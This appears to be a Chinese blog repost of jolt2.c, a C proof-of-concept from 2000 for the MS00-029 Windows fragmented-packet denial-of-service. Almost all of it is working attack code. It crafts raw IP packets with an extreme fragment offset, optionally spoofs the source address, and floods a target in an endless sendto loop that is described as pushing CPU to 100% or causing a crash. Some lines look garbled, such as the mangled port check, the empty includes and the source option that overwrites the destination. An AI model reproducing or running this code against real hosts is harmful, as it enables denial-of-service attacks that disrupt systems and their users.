拒绝服务攻击之jolt.c

 /* Jolt2.c - Tested against Win98, WinNT4/sp5,6, Win2K.
An interesting side note is that minor changes to this packet cause
NT4/Win2k (maybe others, not tested) memory use to jump
*substantially* (+70 meg non-paged-pool on a machine with 196 mb
phys). There seems to be a hard upper limit, but on machines with smaller
amounts of memory or smaller swapfiles, ramping up the non-paged-pool this
much might lead to a BSOD.
.phonix.
*/
/*
* File:  jolt2.c
* Author: Phonix 
* Date:  23-May-00
*
* Description: This is the proof-of-concept code for the
*       Windows denial-of-serice attack described by
*       the Razor team (NTBugtraq, 19-May-00)
*       (MS00-029). This code causes cpu utilization
*       to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
*     Insert your name here if you think you wrote some of
*     it. It's a trivial exploit, so I won't take credit
*     for anything except putting this file together.
*/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
struct _pkt
{
struct iphdr  ip;
union {
  struct icmphdr icmp;
  struct udphdr  udp;
} proto;
char data;
} pkt;
int icmplen = sizeof(struct icmphdr),
  udplen  = sizeof(struct udphdr),
  iplen  = sizeof(struct iphdr),
  spf_sck;
void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr/n",
      pname);
fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP/n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
  return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int   bs, psize;
unsigned long x;
struct sockaddr_in to;
to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;
if (port)
  psize = iplen + udplen + 1;
else
  psize = iplen + icmplen + 1;
memset(&pkt, 0, psize);
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190);
if (port)
{
  pkt.proto.udp.source = htons(port|1235);
  pkt.proto.udp.dest = htons(port);
  pkt.proto.udp.len = htons(9);
  pkt.data = 'a';
} else {
  pkt.proto.icmp.type = ICMP_ECHO;
  pkt.proto.icmp.code = 0;
  pkt.proto.icmp.checksum = 0;
}
while (1) {
  bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
       sizeof(struct sockaddr));
}
return bs;
}
int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0;
char hostname[32];
if (argc < 2)
  usage (argv[0]);
gethostname (hostname, 32);
src_addr = host_to_ip(hostname);
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
  switch (i)
  {
   case 's':
    dst_addr = host_to_ip(optarg);
    if (!dst_addr)
     quit("Bad source address given.");
    break;
   case 'p':
    port = atoi(optarg);
    if ((port 65535))
     quit ("Invalid port number given.");
    break;
   case 'h':
   default:
    usage (argv[0]);
  }
}
dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
  quit("Bad destination address given.");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
  quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
   sizeof(bs)) < 0)
  quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port);
}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值